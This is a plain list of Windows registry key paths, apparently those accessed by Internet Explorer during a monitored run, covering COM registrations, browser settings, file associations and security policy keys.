HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{03B5835F-F03C-411B-9CE2-AA23E1171E36}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3697C5FA-60DD-4B56-92D4-74A569205C16}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{70FAF614-E0B1-11D3-8F5C-00C04F9CF4AC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{A028AE76-01B1-46C2-99C4-ACD9858AE02F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_CURRENT_USER\Keyboard Layout\Toggle
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
HKEY_CURRENT_USER\Software\Microsoft\CTF\DirectSwitchHotkeys
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Min_Width
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Min_Height
HKEY_CURRENT_USER\Software\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History\DaysToKeep
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Classes\Interface\{9EC704BA-E1D4-45C5-9B59-BFAE07D9F04E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EC704BA-E1D4-45C5-9B59-BFAE07D9F04E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EC704BA-E1D4-45C5-9B59-BFAE07D9F04E}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{B40C43F1-F039-44D2-AEB7-87F5AF8ABC3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B40C43F1-F039-44D2-AEB7-87F5AF8ABC3D}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B40C43F1-F039-44D2-AEB7-87F5AF8ABC3D}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{F704B7E0-4760-46FF-BBDB-7439E0A2A814}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F704B7E0-4760-46FF-BBDB-7439E0A2A814}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F704B7E0-4760-46FF-BBDB-7439E0A2A814}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order
\xe9\x80\x80\xc7\xa7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\DisplayName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\DisplayMask
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\Expiration
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\ErrorState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE\DontUseDesktopChangeRouter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Marlett
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\DefaultAuthLevel
HKEY_CURRENT_USER\Software\Classes\Interface\{00020400-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00020400-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00020400-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020420-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020420-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020424-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\Forward
HKEY_CURRENT_USER\Software\Classes\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\TypeLib
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\TypeLib\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\TypeLib\Version
HKEY_CURRENT_USER\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win32\(Default)
HKEY_CURRENT_USER\Software\Classes\TypeLib
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\UDTAlignmentPolicy
HKEY_CURRENT_USER\Software\Classes\Interface\{48A98A1F-5CDD-47EE-9286-DB04A3EB7CE1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{48A98A1F-5CDD-47EE-9286-DB04A3EB7CE1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{48A98A1F-5CDD-47EE-9286-DB04A3EB7CE1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{B722BCCB-4E68-101B-A2BC-00AA00404770}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B722BCCB-4E68-101B-A2BC-00AA00404770}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B722BCCB-4E68-101B-A2BC-00AA00404770}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use FormSuggest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Use FormSuggest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_CLASSES_ROOT\MIME\Database\Content Type\image/x-icon
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\image/x-icon\Extension
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\QuickTabsLastUsed
HKEY_CURRENT_USER\Software\Classes\Interface\{9706DA66-D17C-48A5-B42D-39963D174DC0}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9706DA66-D17C-48A5-B42D-39963D174DC0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9706DA66-D17C-48A5-B42D-39963D174DC0}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{5C193B57-4EC0-4387-B98E-BEBF10136422}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{5C193B57-4EC0-4387-B98E-BEBF10136422}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{5C193B57-4EC0-4387-B98E-BEBF10136422}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\UseMRUSwitching
HKEY_CLASSES_ROOT\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NormalizeLinkNetPidls
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.NamespaceCLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{28636AA6-953D-11D2-B5D6-00C04FD918D0} 6
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameShutdownDelay
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameShutdownDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\Version
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\DownloadUpdates
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences\2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences\88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\StaleIETldCache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\ClearableListData
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy\ClearBrowsingHistoryOnExit
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\DEPOff
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLESAFESEARCHPATH_KB963027
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLESAFESEARCHPATH_KB963027
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Low Rights
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ProtectedModeOffForAllZones
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Low Rights
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\LuaOffLoRIEOn
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\New Windows
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\New Windows\DetourDialogs
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\New Windows
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
